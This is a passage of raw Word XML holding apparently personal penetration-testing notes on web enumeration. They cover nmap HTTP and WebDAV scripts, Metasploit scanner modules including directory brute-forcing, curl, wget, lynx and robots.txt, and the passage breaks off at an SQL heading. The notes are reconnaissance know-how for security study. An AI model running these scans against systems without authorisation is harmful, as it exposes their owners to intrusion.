          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 80 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>http-methods” –script-args http-methods.url-path</w:t>
      </w:r>
      <w:r w:rsidR="001B63E3" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=/(DIRECTORY/”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7385FE18" w14:textId="39205829" w:rsidR="001B63E3" w:rsidRPr="002A77BD" w:rsidRDefault="001B63E3" w:rsidP="001B63E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate a directory along with your general NMAP scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0ABA51" w14:textId="7F166582" w:rsidR="001B63E3" w:rsidRPr="002A77BD" w:rsidRDefault="001B63E3" w:rsidP="001B63E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Reveal methods that could be risky.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEBC70D" w14:textId="53DF6595" w:rsidR="001B63E3" w:rsidRPr="002A77BD" w:rsidRDefault="001B63E3" w:rsidP="001B63E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 80 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>http-webdav-scan” –script-args http-methods.url-path=/webdav/”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19743A42" w14:textId="257D29AA" w:rsidR="001B63E3" w:rsidRPr="002A77BD" w:rsidRDefault="001B63E3" w:rsidP="001B63E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidR="00396EC7" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the directory for WebDAV was enumerated, it doesn’t work obviously if that directory is not there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4374B8" w14:textId="03F31BAE" w:rsidR="001B63E3" w:rsidRPr="002A77BD" w:rsidRDefault="001B63E3" w:rsidP="001B63E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will display/enumerate WebDAV version and service info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF792A0" w14:textId="5AB88305" w:rsidR="001B63E3" w:rsidRPr="002A77BD" w:rsidRDefault="001B63E3" w:rsidP="001B63E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00B250CB" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28957E56" w14:textId="516B0F9A" w:rsidR="00B250CB" w:rsidRPr="002A77BD" w:rsidRDefault="00B250CB" w:rsidP="00B250CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 80 -sV –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062A245" w14:textId="4439D974" w:rsidR="00B250CB" w:rsidRPr="002A77BD" w:rsidRDefault="00B250CB" w:rsidP="00B250CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Display server header, this is a default script that’s run with -sC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3A59C2" w14:textId="77777777" w:rsidR="00B250CB" w:rsidRPr="002A77BD" w:rsidRDefault="00B250CB" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255C626A" w14:textId="18A3F9B1" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit – HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEBE67D" w14:textId="136EE7C0" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/http/http_version”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF75F8A" w14:textId="3E5A08B8" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will enumerate http version, much like the previous nmap command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B368E0" w14:textId="4A846D85" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/http/brute_dirs”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EE09A" w14:textId="32534AD2" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Brute forcing the website in MSFConsole, much like dirb or gobuster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417374CC" w14:textId="568675DB" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will utilize an already provided wordlist that comes with MSFConsole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C26B9" w14:textId="4C67F80F" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/http/robots_txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F83612" w14:textId="3328773B" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="0099164C" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate the robots.txt file and find different directories/subdirectories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63F330" w14:textId="3F3622E4" w:rsidR="0099164C" w:rsidRPr="002A77BD" w:rsidRDefault="0099164C" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Try to curl these different results, could potentially find something useful!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C965955" w14:textId="77777777" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A69AA66" w14:textId="775F3F37" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22373D42" w14:textId="506D6158" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“curl (IP/DOMAIN)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1943E48B" w14:textId="10032582" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will curl website info (header info, HTML info, etc. etc. etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C952CA4" w14:textId="77777777" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC30B68" w14:textId="60C843AC" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WGET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B916EEB" w14:textId="24E2D92B" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="002A77BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://(IP/DOMAIN)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19FD4E08" w14:textId="196D6A82" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can download a file from a webserver based on the directory you give it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133AFF85" w14:textId="03DEF594" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This means you can download the HTML version of a website or a directory within a website straight to your machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E88413A" w14:textId="77777777" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0728C85B" w14:textId="0498E4D5" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LYNX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF82E01" w14:textId="3AC2F334" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“lynx </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="002A77BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://(IP/DOMAIN)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65543E33" w14:textId="7A43AE34" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Relatively similar to BROWSH, however it’s much easier on the eyes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB76DB" w14:textId="783C202F" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168E8C44" w14:textId="14C81238" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996D055" w14:textId="5D9CB965" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The search engine utilizes it to understand which pages and/or files are accessible to spider and are included in search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C65C70F" w14:textId="6EB36F3B" w:rsidR="009F3D85" w:rsidRPr="002A77BD" w:rsidRDefault="009F3D85" w:rsidP="009F3D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This could be helpful and tell us certain directories and/or subdirectories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A593D" w14:textId="77777777" w:rsidR="00184676" w:rsidRPr="002A77BD" w:rsidRDefault="00184676" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB509FD" w14:textId="77777777" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E89941C" w14:textId="77777777" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571246FB" w14:textId="77777777" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F9877D" w14:textId="77777777" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30163908" w14:textId="77777777" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3548D16C" w14:textId="77777777" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFF2BE7" w14:textId="6C4BD918" w:rsidR="005A3DB9" w:rsidRPr="002A77BD" w:rsidRDefault="005A3DB9" w:rsidP="00184676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL – Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA6A55" w14:textId="39F705E1" w:rsidR="005A3DB9" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="005A3DB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Default </w:t>
      </w:r>
      <w:r w:rsidR="005A3DB9" w:rsidRPr="002A77BD">
        <w:rPr>
